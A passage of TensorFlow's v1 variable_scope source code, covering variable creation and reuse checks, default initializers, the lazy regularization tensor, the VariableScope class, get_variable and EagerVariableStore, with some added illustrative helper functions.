var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
        # ResourceVariables don't have an op associated with them, so there is
        # no traceback to include in the error message.
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape is not None and shape.is_fully_defined():
if "partition_info" in tf_inspect.getargspec(initializer).args:
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
else:
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
def make_regularizer_op():
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
return regularizer(v)
if regularizer(v) is not None:
lazy_eval_tensor = _LazyEvalTensor(make_regularizer_op)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES,
lazy_eval_tensor)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
    # If dtype is floating point, provide a Glorot uniform initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
    # If dtype is DT_INT/DT_UINT/DT_BOOL/DT_STRING, provide a zeros initializer
    # (a default value of zero, `False`, or the empty string, respectively)
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
    # NOTE: DT_STRING is handled above; should DT_COMPLEX be supported here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
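# Illustrative sketch (hypothetical helper, not part of the public API): which
# default initializer `get_variable` falls back to when none is supplied.
# Floating-point variables get glorot_uniform, integer/bool/string variables
# get zeros, and other dtypes (e.g. complex) require an explicit initializer.
def _example_default_initializers():
  with ops.Graph().as_default():
    f = get_variable("f", shape=[2])                      # glorot_uniform
    i = get_variable("i", shape=[2], dtype=dtypes.int32)  # zeros
    try:
      get_variable("c", shape=[2], dtype=dtypes.complex64)
    except ValueError:
      pass  # an initializer is required for complex dtypes
    return f, i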
class _LazyEvalTensor(core.Tensor):
"""A Tensor-like object that only evaluates its thunk when used."""
def __init__(self, thunk):
"""Initializes a _LazyEvalTensor object.
Args:
thunk: A callable. A thunk which computes the value of the tensor.
"""
self._thunk = thunk
self._master_tensor = thunk()
def _as_tensor(self, dtype=None, name=None, as_ref=False):
del name
assert not as_ref
assert dtype in [None, self.dtype]
return self._thunk()
def _make_master_property(name):
@property
def prop(self):
return getattr(self._master_tensor, name) # pylint: disable=protected-access
return prop
_master_property_list = ("device", "dtype", "graph", "name", "op", "shape",
"value_index")
for _name in _master_property_list:
setattr(_LazyEvalTensor, _name, _make_master_property(_name))
def _make_master_method(name):
def method(self, *args, **kwargs):
return getattr(self._master_tensor, name)(*args, **kwargs) # pylint: disable=protected-access
return method
_master_method_list = ("get_shape", "__str__", "shape_as_list")
for _name in _master_method_list:
setattr(_LazyEvalTensor, _name, _make_master_method(_name))
def _make_op_method(name):
def method(self, *args, **kwargs):
return getattr(self._as_tensor(), name)(*args, **kwargs) # pylint: disable=protected-access
return method
_op_list = ("__abs__", "__add__", "__and__", "__bool__", "__div__", "__eq__",
"__floordiv__", "__ge__", "__getitem__", "__gt__", "__invert__",
"__iter__", "__le__", "__len__", "__lt__", "__matmul__", "__mod__",
"__mul__", "__ne__", "__neg__", "__nonzero__", "__or__", "__pow__",
"__radd__", "__rand__", "__rdiv__", "__rfloordiv__", "__rmatmul__",
"__rmod__", "__rmul__", "__ror__", "__rpow__", "__rsub__",
"__rtruediv__", "__rxor__", "__sub__", "__truediv__", "__xor__",
"eval", "numpy")
for _name in _op_list:
setattr(_LazyEvalTensor, _name, _make_op_method(_name))
ops.register_tensor_conversion_function(
_LazyEvalTensor,
lambda val, dtype, name, as_ref: val._as_tensor(dtype, name, as_ref) # pylint: disable=protected-access
)
session.register_session_run_conversion_functions(
_LazyEvalTensor,
lambda fetch: ([fetch._master_tensor], lambda fetched_vals: fetched_vals[0]) # pylint: disable=protected-access
)
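# Illustrative sketch (hypothetical helper, not part of the public API): a
# `_LazyEvalTensor` wraps a thunk and only re-runs it when it is converted to
# a real tensor, which is how the regularization losses recorded above stay
# lazy.
def _example_lazy_eval_tensor():
  with ops.Graph().as_default():
    v = variables.VariableV1([1.0, 2.0])
    lazy = _LazyEvalTensor(lambda: v * 2.0)
    # Shape and dtype queries are answered by the master tensor built at
    # construction time; conversion re-evaluates the thunk.
    assert lazy.dtype == dtypes.float32
    doubled = ops.convert_to_tensor(lazy)
    return doubled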
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
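# Illustrative sketch (hypothetical helper, not part of the public API):
# passing `no_regularizer` for a single variable overrides a default
# regularizer set on the enclosing variable scope, so nothing is recorded for
# that variable. The scope-level regularizer below is only a dummy placeholder.
def _example_no_regularizer():
  with ops.Graph().as_default():
    dummy_regularizer = lambda w: array_ops.identity(w)  # placeholder default
    with variable_scope("scope", regularizer=dummy_regularizer):
      get_variable("reg", shape=[2])  # default regularizer records a loss
      get_variable("no_reg", shape=[2], regularizer=no_regularizer)  # skipped
    assert len(ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)) == 1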
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None, skip_on_eager=False):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None, skip_on_eager=False):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
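# Illustrative sketch (hypothetical helper, not part of the public API): a
# common v1 pattern is to flip the *current* scope into reuse mode partway
# through, so a later `get_variable` call shares previously created weights.
def _example_reuse_current_scope():
  with ops.Graph().as_default():
    with variable_scope("shared"):
      first = get_variable("w", shape=[3])
      get_variable_scope().reuse_variables()
      second = get_variable("w", shape=[3])  # reuses "shared/w"
    assert first is second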
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.compat.v1.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(), name=stripped_var_name, trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
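# Illustrative sketch (hypothetical helper, not part of the public API, and
# assuming eager execution is enabled as in TF2): an EagerVariableStore keeps
# eager variables alive between calls so v1-style `get_variable` can reuse
# them, and `copy()` yields independent variables with the same values.
def _example_eager_variable_store():
  container = EagerVariableStore()
  with container.as_default():
    w = get_variable("w", shape=[2], initializer=init_ops.zeros_initializer())
  with container.as_default():
    w_again = get_variable("w", shape=[2])  # fetched from the store
  assert w is w_again
  snapshot = container.copy()  # independent copies of the stored variables
  return snapshot.variables()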
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
  synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.", "",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n", "", "GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to. Defaults
to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache on the
device where the Ops using the Variable reside, to deduplicate copying
through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a value
of unknown shape. If True, the default, the shape of initial_value must be
known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
    synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
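# Illustrative sketch (added comment, not from the original source): a
# partitioner matching the contract documented above. It receives a fully
# defined shape and a dtype and returns one partition count per axis, with at
# most one axis actually split.
#
#   def split_rows_into_4(shape, dtype):
#     del dtype  # unused by this toy partitioner
#     return [4] + [1] * (shape.ndims - 1)
#
#   # tf.compat.v1.get_variable("w", [20, 10], partitioner=split_rows_into_4)
#   # would then be backed by 4 shards of shape [5, 10].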
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.compat.v1.AUTO_REUSE; if `None`, we inherit
the parent scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
        If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
